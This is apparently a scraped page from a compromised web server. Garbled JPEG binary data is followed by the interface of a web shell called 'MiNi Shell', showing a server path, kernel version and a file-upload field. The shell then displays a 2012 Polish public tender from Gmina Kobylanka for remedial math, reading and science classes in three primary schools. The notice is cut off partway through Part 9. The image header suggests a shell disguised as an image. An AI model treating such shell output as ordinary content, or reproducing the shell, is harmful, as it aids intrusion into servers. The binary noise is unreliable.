JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/201127-N-2012.html

<p class="kh_header"><b>Kobylanka: Prowadzenie specjalistycznych zajęć wyrównawczych dla uczniów i uczennic w ramach projektu Myślę, liczę, działam</b><br>
<b>Numer ogłoszenia: 201127 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobylanka , ul. Szkolna 12, 73-108 Kobylanka, woj. zachodniopomorskie, tel. 0-91 57 88 521, faks 0 91 57 88 520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kobylanka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie specjalistycznych zajęć wyrównawczych dla uczniów i uczennic w ramach projektu Myślę, liczę, działam.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce w Szkole Podstawowej w Kobylance 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 1 przewidziane są 22 godziny zajęć - korekcja trudności w nauce matematyki oraz korekcja trudności w wykorzy-staniu wiedzy w praktyce; Podziału ilości godzin pomiędzy korekcję trudności w nauce matema-tyki oraz korekcję trudności w wykorzystaniu wiedzy w praktyce dokona Zamawiający, w oparciu o przeprowadzoną diagnozę. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Prowadzone  metodami aktywizującymi w całości-metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 1 zamówienia - 22 godziny. 
9.	Wykonawca części 1 zobowiązany jest do opracowania wspólnie z wykonawcą części 2 oraz 3 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r. 


Część 2 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w czytaniu i pisaniu w Szkole Podstawowej w Kobylance 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w czytaniu i pisaniu - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 2 przewidziany jest jeden blok zajęć: blok B - korekcja trudności w czytaniu i pisaniu (22h); Prowadzone  metodami aktywizującymi w całości - metoda warszta-towa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 2 zamówienia - 22 godziny. 
9.	Wykonawca części 2 zobowiązany jest do opracowania wspólnie z wykonawcą części 1 oraz 3 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r. 

Część 3 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce w Szkole Podstawowej w Kobylance 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w ro-ku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 3 przewidziane są 22 godziny zajęć - korekcja trudności w nauce przyrody oraz korekcja trudności w wykorzystaniu wiedzy w praktyce; Podziału ilości godzin pomiędzy korekcję trudności w nauce przyrody oraz korekcję trudności w wykorzystaniu wiedzy w praktyce dokona Zamawiający, w oparciu o prze-prowadzoną diagnozę. Wykonawca będzie związany podziałem dokonanym przez Zamawiają-cego. Prowadzone  metodami aktywizującymi w całości-metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 3 zamówienia - 22 godziny. 
9.	Wykonawca części 3 zobowiązany jest do opracowania wspólnie z wykonawcą części 1 oraz 2 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - XI.2012 r.

Część 4 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce w Szkole Podstawowej w Kunowie

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 4 przewidziane są 22 godziny zajęć - korekcja trudności w nauce matematyki oraz korekcja trudności w wykorzy-staniu wiedzy w praktyce; Podziału ilości godzin pomiędzy korekcję trudności w nauce matema-tyki oraz korekcję trudności w wykorzystaniu wiedzy w praktyce dokona Zamawiający, w oparciu o przeprowadzoną diagnozę. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego. Prowadzone  metodami aktywizującymi w całości-metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 4 zamówienia - 22 godziny. 
9.	Wykonawca części 4 zobowiązany jest do opracowania wspólnie z wykonawcą części 5 oraz 6 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r. 


Część 5 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w czytaniu i pisaniu w Szkole Podstawowej w Kunowie 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w czytaniu i pisaniu - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 5 przewidziany jest jeden blok zajęć: blok B - korekcja trudności w czytaniu i pisaniu (22h); Prowadzone  metodami aktywizującymi w całości - metoda warszta-towa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 5 zamówienia - 22 godziny. 
9.	Wykonawca części 5 zobowiązany jest do opracowania wspólnie z wykonawcą części 4 oraz 6 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r. 

Część 6 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce w Szkole Podstawowej w Kunowie 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w ro-ku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 6 przewidziane są 22 godziny zajęć - korekcja trudności w nauce przyrody oraz korekcja trudności w wykorzystaniu wiedzy w praktyce; Podziału ilości godzin pomiędzy korekcję trudności w nauce przyrody oraz korekcję trudności w wykorzystaniu wiedzy w praktyce dokona Zamawiający, w oparciu o prze-prowadzoną diagnozę. Wykonawca będzie związany podziałem dokonanym przez Zamawiają-cego. Prowadzone  metodami aktywizującymi w całości-metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 6 zamówienia - 22 godziny. 
9.	Wykonawca części 6 zobowiązany jest do opracowania wspólnie z wykonawcą części 4 oraz 5 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - XI.2012 r.

Część 7 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce w Szkole Podstawowej w Reptowie 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 7 przewidziane są 22 godziny zajęć - korekcja trudności w nauce matematyki oraz korekcja trudności w wykorzy-staniu wiedzy w praktyce; Podziału ilości godzin pomiędzy korekcję trudności w nauce matema-tyki oraz korekcję trudności w wykorzystaniu wiedzy w praktyce dokona Zamawiający, w oparciu o przeprowadzoną diagnozę. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego. Prowadzone  metodami aktywizującymi w całości-metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 7 zamówienia - 22 godziny. 
9.	Wykonawca części 7 zobowiązany jest do opracowania wspólnie z wykonawcą części 8 oraz 9 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r. 


Część 8 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w czytaniu i pisaniu w Szkole Podstawowej w Reptowie 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w czytaniu i pisaniu - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 8 przewidziany jest jeden blok zajęć: blok B - korekcja trudności w czytaniu i pisaniu (22h); Prowadzone  metodami aktywizującymi w całości - metoda warszta-towa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 8 zamówienia - 22 godziny. 
9.	Wykonawca części 8 zobowiązany jest do opracowania wspólnie z wykonawcą części 7 oraz 9 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r. 

Część 9 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce w Szkole Podstawowej w Reptowie 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w ro-ku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 9 przewidziane są 22 godziny zajęć - korekcja trudności w nauce przyrody oraz korekcja trudności w wykorzystaniu wiedzy w praktyce; Podziału ilości godzin pomiędzy korekcję trudności w nauce przyrody oraz korekcję trudności w wykorzystaniu wiedzy w praktyce dokona Zamawiający, w oparciu o prze-prowadzoną diagnozę. Wykonawca będzie związany podziałem dokonanym przez Zamawiają-cego. Prowadzone  metodami aktywizującymi w całości-metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
